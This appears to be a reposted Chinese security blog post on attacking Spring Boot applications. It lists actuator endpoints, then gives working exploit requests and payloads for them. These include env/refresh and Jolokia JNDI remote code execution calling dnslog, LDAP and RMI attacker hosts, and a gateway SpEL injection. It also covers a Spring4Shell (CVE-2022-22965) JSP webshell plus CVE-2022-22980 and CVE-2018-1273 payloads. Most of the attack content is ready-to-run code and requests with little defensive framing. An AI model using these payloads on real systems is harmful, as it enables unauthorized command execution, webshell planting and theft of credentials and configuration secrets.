【技术文章】Spring Boot 测试技巧

admin 2024年10月31日12:48:35评论12 views字数 7193阅读23分58秒阅读模式
Spring Boot介绍

Spring Boot 是一个开源的Java框架,旨在简化Spring应用的创建和部署过程。它是Spring平台和第三方库生态的一部分,由Pivotal团队开发。Spring Boot 旨在让开发者能够更快速地启动和运行新的Spring应用程序,通过提供默认的配置帮助快速启动各种Spring应用上下文和第三方库。
【技术文章】Spring Boot 测试技巧

【技术文章】Spring Boot 测试技巧

PART

【技术文章】Spring Boot 测试技巧
【技术文章】Spring Boot 测试技巧

Spring Boot常见接口

三月就要到了,从今天起,努力去做一个可爱的人,不羡慕谁,也不埋怨谁,在自己的道路上,欣赏自己的风景,遇见自己的幸福。

/swagger-ui.html API接口测试界面
/v2/api-docs API文档
/autoconfig 提供自动配置报告过
/auditevents 显示当前应用程序的审计事件信息
/beans 描述应用程序上下文里全部的Bean
/configprops 描述配置属性(包含默认值)如何注入 Bean
/nacos-config 记录nacos账号密码信息
/dump 获取线程活动的快照
/env 获取全部环境属性
/env/{name} 根据名称获取特定的环境属性值
/flyway 显示数据库迁移路径(如果存在)
/health 应用程序的健康指标,这些值由 HealthIndicator 的实现类提供
/info 获取应用程序的定制信息,这些信息由info 打头的属性提供
/jolokia 通过HTTP暴露JMXbeans
/logfile 返回日志文件内容(如果设置了logging.fle或logging,path
/metrics 报告指定名称的应用程序度量值
/heapdump 返回一个GZip压缩的hprof dump文件
/mappings 描述全部的 URI 路径,以及它们和控制器(包含 Actuator 端点)的映射关系
/refresh 可以配合 POST请求 /env接口设置属性后,再 POST 请求 /restart接口重启应用来触发相关 RCE 漏洞
/gateway 主要用于将客户端请求与服务端应用相分离,提供路由、过滤、断言、流量控制和日志监控等功能
/restart API接口测试界面

【技术文章】Spring Boot 测试技巧

【技术文章】Spring Boot 测试技巧

Spring Boot各接口常见漏洞

1、env接口

    1)未授权信息泄露(不需要授权可查看端点信息)

    2)RCE漏洞(通过eureka.client.serviceUrl.defaultZone)进行rce

    POC:

#1、设置serviceurl值,并在vps进行监听POST /openapi/actuator/env HTTP/1.1Host: IPContent-Type: application/jsonContent-Length: 85
{"name":"eureka.client.serviceUrl.defaultZone","value":"http://¥{PID}your.dnslog.cn"}
#2、重启接口,观察vps收到的信息并解密POST /openapi/actuator/refresh HTTP/1.1Host: IPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0Content-Type: application/json

 

2、swagger-ui.html、/v2/api-docs接口

    1)未授权访问(可以未授权查看接口文档,可进一步对接口进行测试,测试未授权、注入等等类型的漏洞)

3、nacos-config接口

    1)未授权访问,信息泄露(利用该接口可获取nacos账号密码,可获取大量敏感信息。且nacos存在RCE漏洞可进行尝试利用获取权限)

4、jolokia接口

    1)命令执行1(jolokia logback JNDI注入,通过/jolokia/exec/ch.qos.logback.classic:远程调用恶意类造成RCE)

1、启动一个恶意的ldap
2、制作一个logback.xml文件内容如下<configuration><insertFromJNDI env-entry-name="ldap://恶意的ldap地址" as="appName" /></configuration>
3、使用以下地址进行jndi注入http://localhost:9094/actuator/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/192.168.0.108:8000!/logback.xml

     2)命令执行2(jolokia Realm JNDI注入,通过调用恶意的rmi,造成RCE漏洞)

#!/usr/bin/env python3# coding: utf-8import requests  url = 'http://127.0.0.1/actuator/jolokia'  create_realm = {    "mbean": "Tomcat:type=MBeanFactory",    "type": "EXEC",    "operation": "createJNDIRealm",    "arguments": ["Tomcat:type=Engine"]} wirte_factory = {    "mbean": "Tomcat:realmPath=/realm0,type=Realm",    "type": "WRITE",    "attribute": "contextFactory",    "value": "com.sun.jndi.rmi.registry.RegistryContextFactory"} write_url = {    "mbean": "Tomcat:realmPath=/realm0,type=Realm",    "type": "WRITE",    "attribute": "connectionURL",    "value": "rmi://krk9ve.ceye.io"} stop = {    "mbean": "Tomcat:realmPath=/realm0,type=Realm",    "type": "EXEC",    "operation": "stop",    "arguments": []} start = {    "mbean": "Tomcat:realmPath=/realm0,type=Realm",    "type": "EXEC",    "operation": "start",    "arguments": []} flow = [create_realm, wirte_factory, write_url, stop, start] for i in flow:    print('%s MBean %s: %s ...' % (i['type'].title(), i['mbean'], i.get('operation', i.get('attribute'))))    r = requests.post(url, json=i)    r.json()    print(r.status_code)

5、heapdump接口

    1)未授权信息泄露(使用java自带的jvisualvm.exe加载该文件或使用工具https://github.com/wyzxxz/heapdump_tool进行解密数据)

【技术文章】Spring Boot 测试技巧

6、gateway接口

    1)/gateway/route rce 漏洞(通过添加恶意路由从而进行rce)

1、添加恶意路由POST /actuator/gateway/routes/testxxxHTTP/1.1Host: 192.168.42.145:8080Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36Connection: closeContent-Type: application/jsonContent-Length: 334

{"id": "testxxx","filters": [{"name": "AddResponseHeader","args": {"name": "Result","value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{"whoami"}).getInputStream()))}"}}],"uri": "http://example.com"}
2、刷新路由POST /actuator/gateway/refresh HTTP/1.1Host: 192.168.42.145:8080Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 334

{}
3、访问路由造成命令执行GET /actuator/gateway/routes/testxxx HTTP/1.1Host: 192.168.42.145:8080Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 334

【技术文章】Spring Boot 测试技巧

Spring 框架其他漏洞

1、Spring Framework RCE (CVE-2022-22965)漏洞

POC:

GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1Host: localhost:8080User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:99.0) Gecko/20100101 Firefox/99.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closesuffix: %>//c1: Runtimec2: <%DNT: 1

shell地址:http://127.0.0.1:8080//tomcatwar.jsp?pwd=j&cmd=whoami

2、Spring Data MongoDB SpEL表达式注入漏洞(CVE-2022-22980)漏洞

POC:

POST /get HTTP/1.1Host: 172.17.148.66:9576Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflatecmd: idAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Length: 5737

a=T(java.lang.Runtime).getRuntime().exec("ping vfxbpdoaqs.dnstunnel.run")

3、Spring Data Commons RCE (CVE-2018-1273)漏洞

POST /users?page=&size=5 HTTP/1.1Host: localhost:8080Connection: keep-aliveContent-Length: 124Pragma: no-cacheCache-Control: no-cacheOrigin: http://localhost:8080Upgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8Referer: http://localhost:8080/users?page=0&size=5Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9,en;q=0.8

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/success")]=&password=&repeatedPassword=

【技术文章】Spring Boot 测试技巧

本篇文章到这里就结束了后边有新的会继续补充。感谢观看。

【技术文章】Spring Boot 测试技巧
【技术文章】Spring Boot 测试技巧
【技术文章】Spring Boot 测试技巧

原文始发于微信公众号(小羊安全屋):【技术文章】Spring Boot 测试技巧

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月31日12:48:35
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【技术文章】Spring Boot 测试技巧https://cn-sec.com/archives/3337757.html

发表评论

匿名网友 填写信息